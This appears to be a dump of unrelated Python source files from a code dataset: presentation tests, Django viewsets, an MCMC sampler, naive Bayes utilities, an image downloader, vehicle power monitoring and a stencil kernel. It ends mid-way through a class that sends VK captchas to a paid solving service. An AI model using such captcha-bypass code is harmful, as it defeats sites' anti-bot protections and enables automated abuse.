it_provides_ref_to_package_presentation_part(self):\n pkg = Package.open()\n assert isinstance(pkg.presentation, Presentation)\n\n def it_provides_ref_to_package_core_properties_part(self):\n pkg = Package.open()\n assert isinstance(pkg.core_properties, CoreProperties)\n\n def it_can_save_itself_to_a_pptx_file(self, temp_pptx_path):\n \"\"\"Package.save produces a .pptx with plausible contents\"\"\"\n # setup ------------------------\n pkg = Package.open()\n # exercise ---------------------\n pkg.save(temp_pptx_path)\n # verify -----------------------\n pkg = Package.open(temp_pptx_path)\n prs = pkg.presentation\n assert prs is not None\n slidemasters = prs.slidemasters\n assert slidemasters is not None\n assert len(slidemasters) == 1\n slidelayouts = slidemasters[0].slidelayouts\n assert slidelayouts is not None\n assert len(slidelayouts) == 11\n\n # fixtures ---------------------------------------------\n\n @pytest.fixture\n def temp_pptx_path(self, tmpdir):\n return absjoin(str(tmpdir), 'test-pptx.pptx')\n\n\nclass DescribePresentation(object):\n\n def it_provides_access_to_the_slide_masters(self, prs):\n assert isinstance(prs.slidemasters, PartCollection)\n\n def it_creates_slide_collection_on_first_reference(\n self, prs, SlideCollection_, sldIdLst_, slides_):\n slides = prs.slides\n # verify -----------------------\n prs._element.get_or_add_sldIdLst.assert_called_once_with()\n SlideCollection_.assert_called_once_with(sldIdLst_, prs)\n slides.rename_slides.assert_called_once_with()\n assert slides == slides_\n\n def it_reuses_slide_collection_instance_on_later_references(self, prs):\n slides_1 = prs.slides\n slides_2 = prs.slides\n assert slides_2 is slides_1\n\n # fixtures ---------------------------------------------\n\n @pytest.fixture\n def ct_presentation_(self, request, sldIdLst_):\n ct_presentation_ = instance_mock(request, CT_Presentation)\n ct_presentation_.get_or_add_sldIdLst.return_value = 
sldIdLst_\n return ct_presentation_\n\n @pytest.fixture\n def prs(self, ct_presentation_):\n partname = PackURI('/ppt/presentation.xml')\n prs = Presentation(partname, None, ct_presentation_, None)\n return prs\n\n @pytest.fixture\n def sldIdLst_(self, request):\n return instance_mock(request, CT_SlideIdList)\n\n @pytest.fixture\n def SlideCollection_(self, request, slides_):\n SlideCollection_ = class_mock(\n request, 'pptx.presentation.SlideCollection'\n )\n SlideCollection_.return_value = slides_\n return SlideCollection_\n\n @pytest.fixture\n def slides_(self, request):\n return instance_mock(request, SlideCollection)\n","sub_path":"tests/test_presentation.py","file_name":"test_presentation.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"554149826","text":"from django.conf import settings\nfrom django.contrib.auth.models import Group\nfrom django.contrib.sites.models import Site\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom rdmo.core.permissions import HasModelPermission\n\nfrom .serializers import GroupSerializer, SiteSerializer\n\n\nclass SettingsViewSet(viewsets.GenericViewSet):\n\n permission_classes = (IsAuthenticated, )\n\n def list(self, request, *args, **kwargs):\n return Response({\n key.lower(): getattr(settings, key) for key in settings.SETTINGS_API\n })\n\n\nclass SitesViewSet(viewsets.ReadOnlyModelViewSet):\n permission_classes = (HasModelPermission, )\n queryset = Site.objects.all()\n serializer_class = SiteSerializer\n\n\nclass GroupViewSet(viewsets.ReadOnlyModelViewSet):\n permission_classes = (HasModelPermission, )\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass CopyModelMixin:\n\n @action(detail=True, methods=['PUT'], permission_classes=[HasModelPermission])\n def copy(self, request, pk=None):\n # get the instance to be copied\n instance = self.get_object()\n\n # get the copy relevant data from the request\n uri_prefix = request.data.get('uri_prefix')\n key = request.data.get('key')\n\n # get the parent fields from the model\n try:\n parent_fields = instance.parent_fields\n parent_ids = [request.data.get(parent_field) for parent_field in parent_fields]\n except AttributeError:\n parent_fields = parent_ids = []\n\n # get the original and the original_serializer\n original = self.get_object()\n original_serializer = self.get_serializer(original)\n\n # merge the original_serializer with the data from the request and validate\n data = original_serializer.data\n data.update({\n 'uri_prefix': uri_prefix,\n 'key': key\n })\n for parent_field, parent_id in zip(parent_fields, parent_ids):\n data[parent_field] = parent_id\n validation_serializer = self.get_serializer(data=data)\n validation_serializer.is_valid(raise_exception=True)\n\n # perform the copy on the database\n parents = []\n for parent_field, parent_id in zip(parent_fields, parent_ids):\n parent_model = instance._meta.get_field(parent_field).remote_field.model\n parent = parent_model.objects.filter(pk=parent_id).first()\n parents.append(parent)\n instance.copy(uri_prefix, key, *parents)\n\n # the rest is similar to CreateModelMixin.create()\n serializer = self.get_serializer(instance)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, 
headers=headers)\n","sub_path":"rdmo/core/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"374380566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 23 12:45:06 2016\n\n@author: Mark\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nclass MCMCLog(object):\n \"\"\"\n Stores results of MCMC samplers\n \"\"\"\n def __init__(self, sampler=None):\n self.sampler = sampler\n self.state_history = []\n self.accepts = []\n self.times = []\n self.start_time = 0\n self.accept_ratio = 0\n\n def initialise(self):\n \"\"\"\n Record time at which MCMC routine began\n \"\"\"\n self.start_time = time.time()\n\n def record(self, acceptance, new_x, new_p):\n \"\"\"\n Stores the new state, acceptance result and elapsed time of a single step of MCMC\n \"\"\"\n self.state_history.append(np.copy(new_x))\n self.accepts.append(acceptance)\n self.times.append(time.time() - self.start_time)\n \n def summary(self):\n \"\"\"\n Prints a summary of the MCMC routine to stdout\n \"\"\"\n print('---------- GHMC SAMPLER ----------')\n print('Time taken: {}'.format(self.times[-1]))\n print('Markov chain steps simulated: {}'.format(len(self.state_history)))\n print('Acceptance ratio: {}'.format(float(np.sum(self.accepts))/len(self.accepts)))\n self.accept_ratio = float(np.sum(self.accepts))/len(self.accepts)\n \n def plot(self, start=0, lines=False):\n \"\"\"\n For use when targeting 2D densities - plots scatter diagram of samples\n \"\"\"\n # Samples\n if not lines:\n plt.scatter([s[0] for s in self.state_history[start:]], [s[1] for s in self.state_history[start:]])\n else:\n plt.plot([s[0] for s in self.state_history[start:]], [s[1] for s in self.state_history[start:]], '.r-')\n # Contour of potential\n xlow, xhigh = plt.gca().get_xlim()\n x_range = xhigh-xlow\n xhigh += x_range*0.1\n xlow -= x_range*0.1\n ylow, yhigh = plt.gca().get_ylim()\n y_range = yhigh-ylow\n yhigh += y_range*0.1\n ylow += y_range*0.1\n xdelta = x_range/80.0\n ydelta = y_range/80.0\n x = np.arange(xlow, xhigh, xdelta)\n y = np.arange(ylow, yhigh, ydelta)\n X, Y = np.meshgrid(x, y)\n potential = np.empty(X.shape)\n for i in range(potential.shape[0]):\n for j in range(potential.shape[1]):\n potential[i,j] = self.sampler.H(np.array([X[i,j], Y[i,j]]), np.array([0, 0]))\n plt.contour(X, Y, potential)\n plt.gca().set_xlim([xlow, xhigh])\n plt.gca().set_ylim([ylow, yhigh])\n plt.grid()\n\nclass GHMCSampler(object):\n def __init__(self, density, A):\n \"\"\"\n Stores the Hamiltonian and gradient of the Hamiltonian, as well as the\n matrix A controlling the GHMC dynamics\n \"\"\"\n self.density = density\n self.H = self.density.total_E\n self.grad_H = self.density.total_grad_E\n self.A = A\n \n # GHMC parameters\n self.dim = len(self.A)//2\n assert (type(self.dim) is int) \n self.C = self.A[:self.dim, self.dim:]\n self.minusC_T = self.A[self.dim:, :self.dim]\n self.D = self.A[self.dim:, self.dim:]\n self.non_zero_D = np.any(self.D)\n \n # State variables\n self.x = np.zeros(self.dim)\n self.p = np.zeros(self.dim)\n \n # D-matrix parameters\n if self.non_zero_D:\n self.D_diag, self.D_unitary, = np.linalg.eig(self.D)\n self.D_unitary_inv = np.linalg.inv(self.D_unitary)\n # Check that D is invertible\n assert not (self.D_diag==0).any()\n self.D_inv = np.linalg.inv(self.D)\n \"\"\" Look into whether there's any way around setting imaginary part to 0 in line below \"\"\"\n self.exp_D = 
np.real(np.dot(self.D_unitary, np.dot(np.diag(np.exp(self.D_diag)), self.D_unitary_inv)))\n self.cached_stepsize = 0\n self.exp_eD = np.zeros((self.dim, self.dim))\n \n # Log\n self.log = MCMCLog(self)\n \n def _sample_momentum(self):\n \"\"\"\n Implements resampling of the momentum variable\n Other possibilites are allowing momentum to follow a Markov chain itself\n \"\"\"\n return np.random.multivariate_normal(mean=np.zeros(self.dim), cov=np.identity(self.dim))\n\n def leapfrog_flow(self, x, p, stepsize, num_steps):\n \"\"\"\n Implements a full leapfrog flow with starting position and momentum given\n by x and p respectively\n \"\"\"\n # Check whether exp_eD is cached for desired stepsize, if not recalculate exp_eD\n if self.non_zero_D:\n if not stepsize == self.cached_stepsize:\n self.cached_stepsize = stepsize\n self.exp_eD = np.dot(self.D_unitary, np.dot(np.diag(np.exp(stepsize*self.D_diag)), self.D_unitary_inv))\n \"\"\" Extract real part so that computations can continue - LOOK INTO THIS \"\"\"\n self.exp_eD = np.real(self.exp_eD)\n \n # First half-step for H_1\n p += (stepsize/2.0) * np.dot(self.minusC_T, self.grad_H(x, p)[:self.dim])\n \n # Then alternately update H_2 and H_1 flows\n for it in range(num_steps-1):\n # H_2 flow\n self._H2_flow(x, p, self.non_zero_D, stepsize)\n # H_1 flow\n p += stepsize * np.dot(self.minusC_T, self.grad_H(x, p)[:self.dim])\n \n # Final H_2 step\n self._H2_flow(x, p, self.non_zero_D, stepsize)\n # Final H_1 half-step\n p += (stepsize / 2.0) * np.dot(self.minusC_T, self.grad_H(x, p)[:self.dim])\n \n return x, p\n \n def _H2_flow(self, x, p, non_zero_D, stepsize):\n \"\"\"\n Implements the flow for the sub-Hamiltonian H_2 in two cases: D=0, and \n D invertible + antisymmetric\n \n x and p are modified in place to reduce costs of creating new numpy arrays\n \"\"\"\n if non_zero_D:\n x += np.dot(self.C, np.dot(self.D_inv , np.dot((self.exp_eD - np.identity(self.dim)), self.grad_H(x, p)[self.dim:])))\n p += np.dot(self.exp_eD - np.identity(self.dim), self.grad_H(x, p)[self.dim:])\n return\n if not non_zero_D:\n x += stepsize * np.dot(self.C, self.grad_H(x, p)[self.dim:])\n return\n \n def sample(self, time_units, stepsize, num_steps, initial_x=None):\n \"\"\"\n Runs a full MCMC routine\n \"\"\"\n # Setup\n self.log.initialise()\n if initial_x is None:\n initial_x = np.zeros(self.dim)\n self.x = initial_x\n \n for t in range(time_units):\n # Propose new state\n self.p = self._sample_momentum()\n proposed_p = np.copy(self.p)\n proposed_x = np.copy(self.x)\n self.leapfrog_flow(proposed_x, proposed_p, stepsize, num_steps)\n # Acceptance test\n accept = (np.random.uniform() < np.exp(-self.H(proposed_x, proposed_p)+self.H(self.x, self.p)))\n if accept:\n self.x = np.copy(proposed_x)\n self.p = np.copy(proposed_p)\n else:\n pass\n # Make log of most recent step\n self.log.record(accept, self.x, self.p)\n \n # Print summary of Markov chain simulation\n self.log.summary()\n \n# TESTING\nif __name__ == \"__main__\":\n pass","sub_path":"Code/Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"138883358","text":"import struct\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\n\n\ndef gamma(n):\n return factorial(n - 1)\n\n\ndef beta_pdf(p, a, b):\n return (p**(a - 1)) * ((1 - p)**(b - 1)) * (gamma(a + b) / (gamma(a) * gamma(b)))\n\n\ndef factorial(n):\n result = 1\n for x in range(1, n + 1):\n result *= x\n return 
result\n\n\ndef nCr(n, r):\n return factorial(n) / (factorial(r) * factorial(n - r))\n\n\ndef load_mnist(train=True):\n if train:\n imgs = read_mnist_img(file_name='data/train-images.idx3-ubyte')\n labels = read_mnist_label(file_name='data/train-labels.idx1-ubyte')\n else:\n imgs = read_mnist_img(file_name='data/t10k-images.idx3-ubyte')\n labels = read_mnist_label(file_name='data/t10k-labels.idx1-ubyte')\n return imgs, labels\n\n\ndef read_mnist_img(file_name):\n with open(file_name, 'rb') as f:\n magic_number, num_imgs = struct.unpack('>ii', f.read(8))\n n_row, n_col = struct.unpack('>ii', f.read(8))\n imgs = np.zeros((num_imgs, n_row, n_col))\n for i in range(num_imgs):\n for row in range(n_row):\n for col in range(n_col):\n value = struct.unpack('>B', f.read(1))[0]\n imgs[i][row][col] = value\n return imgs\n\n\ndef read_mnist_label(file_name):\n with open(file_name, 'rb') as f:\n magic_number, num_labels = struct.unpack('>ii', f.read(8))\n labels = np.zeros(num_labels).astype(np.int32)\n for i in range(num_labels):\n value = struct.unpack('>B', f.read(1))[0]\n labels[i] = int(value)\n return labels\n\n\ndef test_load_minst():\n imgs, labels = load_mnist(train=True)\n print(imgs.shape, labels.shape)\n img = imgs[0]\n title = labels[0]\n print(title)\n plt.imshow(img, cmap='gray'), plt.title(title)\n plt.show()\n\n\ndef argmax(list_):\n return max(enumerate(list_), key=lambda x: x[1])[0]\n\n\n# class Feature_Bins():\n\n# def __init__(self, n_bins=32, id='', min_count=10, min_value=0, max_value=256):\n# self.bins = [min_count for x in range(n_bins)]\n# self.id = id\n# self.min = min_value\n# self.max = max_value\n\n# def pseudocount(self, min_count=10):\n# ''' avoid empty bin '''\n# for i, count in enumerate(self.bins):\n# if count < min_count:\n# diff = min_count - count\n# self.bins[i] = min_count\n# self.bins[argmax(self.bins)] -= diff\n# return self\n\n# def get_bin_num(self, value):\n# interval = (self.max - self.min) // len(self.bins)\n# c = value // interval\n# return c\n\n# def to_bin(self, value):\n# interval = (self.max - self.min) // len(self.bins)\n# c = value // interval\n# self.bins[int(c)] += 1\n\n# def get_count(self, bin_num):\n# return self.bins[int(bin_num)]\n\n# def total_count(self):\n# return sum(self.bins)\n\n# def __len__(self):\n# return len(self.bins)\n\n# ''' define what will A[i] return '''\n\n# def __getitem__(self, key):\n# return self.bins[key]\n\n# ''' define what will happen when A[i] = k is called '''\n\n# def __setitem__(self, key, value):\n# self.bins[key] = value\n\n# def __str__(self):\n# s = 'Feature Bins %s \\n' % (self.id)\n# num_space = [max(len(str(i)), len(str(count))) + 1 for i, count in enumerate(self.bins)]\n# first_line = ['{bin_id:>{width}}'.format(\n# bin_id=i, width=num_space[i]) for i in range(len(self.bins))]\n# second_line = ['{bin_count:>{width}}'.format(bin_count=count, width=num_space[\n# i]) for i, count in enumerate(self.bins)]\n# s += ''.join(first_line) + '\\n'\n# s += ''.join(second_line) + '\\n'\n# return s\n\n\ndef print_probs(probs):\n first_line = ['{label:>5}'.format(label=i) for i in range(len(probs))]\n second_line = ['{prob:>5}'.format(prob='%.2f' % prob) for prob in probs]\n s = '{head:<6}'.format(head='Label') + ''.join(first_line) + '\\n'\n s += '{head:<6}'.format(head='Prob') + ''.join(second_line) + '\\n'\n print(s)\n\n\nclass Gaussian():\n\n def __init__(self, id='', smooth=0.01):\n self.num_data = 0\n self.sum_of_square = 0\n self.sum_of_data = 0\n self.id = id\n self.smooth = smooth\n\n def update(self, data):\n 
self.num_data += 1\n        self.sum_of_data += data\n        self.sum_of_square += data**2\n\n    @property\n    def mean(self):\n        if self.num_data == 0:\n            return 0.0\n        return self.sum_of_data / self.num_data\n\n    @property\n    def variance(self):\n        ''' Var = E[X^2] - (E[X])^2 (mean of squares minus square of the mean) '''\n        if self.num_data == 0:\n            return 0.0\n        return (self.sum_of_square / self.num_data) - (self.mean**2) + self.smooth\n\n    @property\n    def std(self):\n        return self.variance ** (1 / 2)\n\n    def pdf(self, x):\n        p = 1 / (self.std * math.sqrt(2 * math.pi)) * \\\n            math.exp((-1 / 2) * ((x - self.mean) / self.std)**2)\n        if p < 0.00001:\n            print('Data = %d, Mean = %2.f, Var = %.2f, Prob = %f' %\n                  (x, self.mean, self.variance, p))\n        return max(0.0000001, p)\n\n    def logpdf(self, x):\n        # log N(x; mu, var) = -0.5*log(2*pi*var) - (x - mu)^2 / (2*var)\n        return (-1 / 2) * math.log(2 * math.pi * self.variance) + -1 * ((x - self.mean)**2 / (2 * self.variance))\n\n    def distance(self, data):\n        return ((data - self.mean) / self.std)\n\n    def __str__(self):\n        s = 'Gaussian %s\\n' % (self.id)\n        s += 'Mean = %.2f, Variance= %.2f (#data=%d)' % (self.mean, self.variance, self.num_data)\n        return s\n\n\ndef img_to_vector(imgs):\n    N, dims = imgs.shape[0], imgs.shape[1:]\n    dim = 1\n    for d in dims:\n        dim *= d\n    X = np.reshape(imgs, (N, dim))\n    return X\n\nif __name__ == '__main__':\n    # f1 = Feature_Gaussian()\n    # f1.update(-1)\n    # f1.update(1)\n    # print(f1.mean)\n    # print(f1.variance)\n    # print(f1.log_pdf(50))\n    # import scipy.stats\n    # print(scipy.stats.norm(0, 1).logpdf(50))\n    X = img_to_vector(np.zeros((10, 28, 28)))\n    print(X.shape)\n","sub_path":"2_Naive-Bayes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"129896456","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Downloads APOD picture \"\"\"\n\nimport os\n\nimport wget\nfrom hal.internet.web import Webpage\nfrom jplib.desktop.gnome3 import set_wallpaper\n\nAPOD_ROOT = \"https://apod.nasa.gov/apod/\"\nAPOD_URL = APOD_ROOT + \"astropix.html\"\nDOWNLOAD_FOLDER = os.path.join(\n    os.getenv(\"HOME\"),\n    \"Pictures\",\n    \"apod\"\n)\n\n\ndef get_apod_url(url):\n    \"\"\"\n    :param url: str\n        Search image in this page\n    :return: str\n        Url of APOD picture\n    \"\"\"\n\n    w = Webpage(url)\n    w.get_html_source()  # download web page\n    images = w.soup.find_all(\"img\")\n    if images and images[0]:\n        return os.path.join(\n            os.path.dirname(url),  # server root\n            images[0][\"src\"].strip()\n        )\n    else:\n        return None\n\n\ndef download_apod(download_folder):\n    \"\"\"\n    :param download_folder: str\n        Path to existing folder where to download image\n    :return: void\n        Downloads image to folder\n    \"\"\"\n\n    image_url = get_apod_url(APOD_URL)\n    if image_url:\n        download_path = os.path.join(\n            download_folder,\n            os.path.basename(image_url)  # image name\n        )\n        if not os.path.exists(download_path):  # download if needed\n            wget.download(image_url, download_path)\n\n        return download_path\n\n\ndef main():\n    if not os.path.exists(DOWNLOAD_FOLDER):  # create download folder if needed\n        os.makedirs(DOWNLOAD_FOLDER)\n\n    download_path = download_apod(DOWNLOAD_FOLDER)\n    print(\"Downloaded APOD image\")\n    set_wallpaper(download_path)\n    print(\"Set as wallpaper\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"internet/download_apod.py","file_name":"download_apod.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"435420203","text":"import datetime\nimport random\nimport threading\nimport time\nfrom 
statistics import mean\n\nfrom cereal import log\nfrom selfdrive.swaglog import cloudlog\n\nPANDA_OUTPUT_VOLTAGE = 5.28\n\n\n# Parameters\ndef get_battery_capacity():\n return _read_param(\"/sys/class/power_supply/battery/capacity\", int)\n\n\ndef get_battery_status():\n # This does not correspond with actual charging or not.\n # If a USB cable is plugged in, it responds with 'Charging', even when charging is disabled\n return _read_param(\"/sys/class/power_supply/battery/status\", lambda x: x.strip(), '')\n\n\ndef get_battery_current():\n return _read_param(\"/sys/class/power_supply/battery/current_now\", int)\n\n\ndef get_battery_voltage():\n return _read_param(\"/sys/class/power_supply/battery/voltage_now\", int)\n\n\ndef get_usb_present():\n return _read_param(\"/sys/class/power_supply/usb/present\", lambda x: bool(int(x)), False)\n\n\ndef get_battery_charging():\n # This does correspond with actually charging\n return _read_param(\"/sys/class/power_supply/battery/charge_type\", lambda x: x.strip() != \"N/A\", False)\n\n\ndef set_battery_charging(on):\n with open('/sys/class/power_supply/battery/charging_enabled', 'w') as f:\n f.write(f\"{1 if on else 0}\\n\")\n\n\n# Helpers\ndef _read_param(path, parser, default=0):\n try:\n with open(path) as f:\n return parser(f.read())\n except Exception:\n return default\n\n\ndef panda_current_to_actual_current(panda_current):\n # From white/grey panda schematic\n return (3.3 - (panda_current * 3.3 / 4096)) / 8.25\n\n\nclass PowerMonitoring:\n def __init__(self):\n self.last_measurement_time = None # Used for integration delta\n self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad\n self.next_pulsed_measurement_time = None\n self.integration_lock = threading.Lock()\n\n # Calculation tick\n def calculate(self, health):\n try:\n now = time.time()\n\n # Check that time is valid\n if datetime.datetime.fromtimestamp(now).year < 2019:\n return\n\n # Only integrate when there is no ignition\n # If health is None, we're probably not in a car, so we don't care\n if health is None or (health.health.ignitionLine or health.health.ignitionCan) or \\\n health.health.hwType == log.HealthData.HwType.unknown:\n with self.integration_lock:\n self.last_measurement_time = None\n self.next_pulsed_measurement_time = None\n self.power_used_uWh = 0\n return\n\n # First measurement, set integration time\n with self.integration_lock:\n if self.last_measurement_time is None:\n self.last_measurement_time = now\n return\n\n is_uno = health.health.hwType == log.HealthData.HwType.uno\n # Get current power draw somehow\n current_power = 0\n if get_battery_status() == 'Discharging':\n # If the battery is discharging, we can use this measurement\n # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in\n current_power = ((get_battery_voltage() / 1000000) * (get_battery_current() / 1000000))\n elif (health.health.hwType in [log.HealthData.HwType.whitePanda, log.HealthData.HwType.greyPanda]) and (health.health.current > 1):\n # If white/grey panda, use the integrated current measurements if the measurement is not 0\n # If the measurement is 0, the current is 400mA or greater, and out of the measurement range of the panda\n # This seems to be accurate to about 5%\n current_power = (PANDA_OUTPUT_VOLTAGE * panda_current_to_actual_current(health.health.current))\n elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):\n # TODO: Figure out why this is off by a factor of 3/4???\n 
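# NOTE: 1.33 is roughly 4/3, which would cancel the suspected 3/4 scaling in the TODO above\n        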
FUDGE_FACTOR = 1.33\n\n # Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal\n def perform_pulse_measurement(now):\n try:\n set_battery_charging(False)\n time.sleep(5)\n\n # Measure for a few sec to get a good average\n voltages = []\n currents = []\n for i in range(6):\n voltages.append(get_battery_voltage())\n currents.append(get_battery_current())\n time.sleep(1)\n current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))\n\n self._perform_integration(now, current_power * FUDGE_FACTOR)\n\n # Enable charging again\n set_battery_charging(True)\n except Exception:\n cloudlog.exception(\"Pulsed power measurement failed\")\n\n # Start pulsed measurement and return\n threading.Thread(target=perform_pulse_measurement, args=(now,)).start()\n self.next_pulsed_measurement_time = None\n return\n\n elif self.next_pulsed_measurement_time is None and not is_uno:\n # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one\n # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is\n # We shouldn't do this very often, so make sure it has been some long-ish random time interval\n self.next_pulsed_measurement_time = now + random.randint(120, 180)\n return\n else:\n # Do nothing\n return\n\n # Do the integration\n self._perform_integration(now, current_power)\n except Exception:\n cloudlog.exception(\"Power monitoring calculation failed\")\n\n def _perform_integration(self, t, current_power):\n with self.integration_lock:\n try:\n if self.last_measurement_time:\n integration_time_h = (t - self.last_measurement_time) / 3600\n power_used = (current_power * 1000000) * integration_time_h\n if power_used < 0:\n raise ValueError(f\"Negative power used! 
Integration time: {integration_time_h} h Power used: {power_used} uWh\")\n          self.power_used_uWh += power_used\n          self.last_measurement_time = t\n      except Exception:\n        cloudlog.exception(\"Integration failed\")\n\n  # Get the power usage\n  def get_power_used(self):\n    return int(self.power_used_uWh)\n","sub_path":"selfdrive/thermald/power_monitoring.py","file_name":"power_monitoring.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
{"seq_id":"100147466","text":"from __future__ import print_function\nfrom snowflake.nodes import StencilComponent, SparseWeightArray\nfrom snowflake.vector import Vector\nfrom hpgmg.finite_volume.operators.kernels.base_kernel import BaseKernel\n\n__author__ = 'nzhang-dev'\n\n\nclass VonNeumannStencil(BaseKernel):\n    def __init__(self, dimensions, a, b, h2inv):\n        self.dimensions = dimensions\n        self.b = b\n        self.a = a\n        self.h2inv = h2inv\n\n\nclass VariableCoefficientVonNeumannStencil(VonNeumannStencil):\n    def get_stencil(self):\n        alpha_component = StencilComponent('alpha', SparseWeightArray({(0,)*self.dimensions: 1}))\n        mesh_primary = StencilComponent('mesh', SparseWeightArray({(0,)*self.dimensions: 1}))\n        scale_factor = self.a * alpha_component * mesh_primary - self.b * self.h2inv\n        forward_facing_components = []\n        backward_facing_components = []\n        zero_vec = Vector.zero_vector(self.dimensions)\n        for dim in range(self.dimensions):\n            beta_back = StencilComponent('beta_{}'.format(dim), SparseWeightArray({zero_vec: 1}))\n            mesh_back = StencilComponent('mesh', SparseWeightArray({\n                -Vector.unit_vector(dim, self.dimensions): 1,\n                zero_vec: -1\n            }))\n            beta_forwards = StencilComponent('beta_{}'.format(dim), SparseWeightArray({\n                Vector.unit_vector(dim, self.dimensions): 1\n            }))\n            mesh_forwards = StencilComponent('mesh', SparseWeightArray({\n                Vector.unit_vector(dim, self.dimensions): 1,\n                zero_vec: -1\n            }))\n            forward_facing_components.append(beta_back * mesh_back)\n            backward_facing_components.append(beta_forwards * mesh_forwards)\n        total = scale_factor * sum(forward_facing_components + backward_facing_components)\n        return total\n\nclass ConstantCoefficientVonNeumannStencil(VonNeumannStencil):\n    def get_stencil(self):\n        #print(self.a, self.b, self.h2inv)\n        a_component = self.a * StencilComponent('mesh',\n                                                SparseWeightArray({Vector.zero_vector(self.dimensions): 1}))\n        von_neumann_points = list(Vector.von_neumann_vectors(self.dimensions, radius=1, closed=False))\n        weights = {point: 1 for point in von_neumann_points}\n        weights[Vector.zero_vector(self.dimensions)] = -len(von_neumann_points)\n        b_component = self.b * self.h2inv * StencilComponent('mesh', SparseWeightArray(weights))\n        return a_component - b_component","sub_path":"hpgmg/finite_volume/operators/kernels/von_neumann.py","file_name":"von_neumann.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
{"seq_id":"389789703","text":"class Solution(object):\n    def twoSum(self, numbers, target):\n        \"\"\"\n        :type numbers: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        count_dict = dict()\n        for i in range(len(numbers)):\n            if numbers[i] in count_dict:\n                return [count_dict[numbers[i]]+1, i+1]\n\n            else:\n                # remember which index is waiting for this complement\n                count_dict[target-numbers[i]] = i\n\n        # print(count_dict)\n\n\n# sol = Solution()\n# inp = [2, 7, 11, 15]\n# target = 9\n# print(sol.twoSum(inp, 
target)","sub_path":"Algorithms/167_Two_Sum_2_Input_array_sorted/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"520293259","text":"#!/usr/bin/env python3\n\n# --------------------- #\n# -- SEVERAL IMPORTS -- #\n# --------------------- #\n\nimport json\n\nfrom mistool.os_use import PPath\n\n\n# ------------------- #\n# -- MODULE TESTED -- #\n# ------------------- #\n\nfrom orpyste import section\n\n\n# ----------------------- #\n# -- GENERAL CONSTANTS -- #\n# ----------------------- #\n\nTHIS_DIR = PPath(__file__).parent\nDATAS_DIR = THIS_DIR / \"datas_for_tests\"\n\nREAD_SECTION_CLASS = section.Read\n\n\n# --------------- #\n# -- CLEANINGS -- #\n# --------------- #\n\ndef test_data_read_all():\n for jsonpath in DATAS_DIR.walk(\"file::search/**.json\"):\n with jsonpath.open() as f:\n jsoninfos = json.load(f)\n\n mode = jsoninfos[\"mode\"]\n search = jsoninfos[\"search\"]\n\n with READ_SECTION_CLASS(\n content = jsonpath.with_ext(\"peuf\"),\n mode = mode\n ) as data_infos:\n for querypath, nblines in search.items():\n nblinesfound = []\n\n for oneinfo in data_infos[querypath]:\n if oneinfo.isblock():\n nblinesfound.append(oneinfo.nbline)\n\n print(jsonpath, \"--->\", querypath, \":\", nblinesfound)\n\n assert nblines == nblinesfound\n","sub_path":"test/data/test_data_search.py","file_name":"test_data_search.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"15513959","text":"from readFromFile import parsedata\nfrom writeTofile import saveTofile\n\nfiles = ['a_example.txt', 'b_read_on.txt', 'c_incunabula.txt',\n 'd_tough_choices.txt', 'e_so_many_books.txt', 'f_librabries_of_the_world.txt']\nfor currentFile in files:\n currentFile0 = \"books/\" + currentFile\n totalBooks, totalLibraries, totalDays, scores, libraries = parsedata(\n currentFile0)\n\n libraries.sort(key=lambda x: x.tRatio, reverse=True)\n currentFile1 = \"solutions/\" + currentFile\n saveTofile(currentFile1, libraries)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"136714646","text":"from selenium.webdriver.common.keys import Keys\nimport webbrowser\nimport re\nimport os\nimport json\nimport requests\nimport random\nimport selenium\nfrom robobrowser import RoboBrowser\nimport time\n\n\nclass vk_captcha:\n\t\"\"\"Класс для работы с каптчей. Вырезает img со страницы, отправляет \n\tв antigate, получает результат, возвращает введенную каптчу в виде строки\"\"\"\n\n\tdef decode(page, root_path):\n\t\t\"\"\"Объединение функций _send_captcha и _check_captcha\"\"\"\n\t\tprint(\"Каптча...\")\n\n\t\tkey = 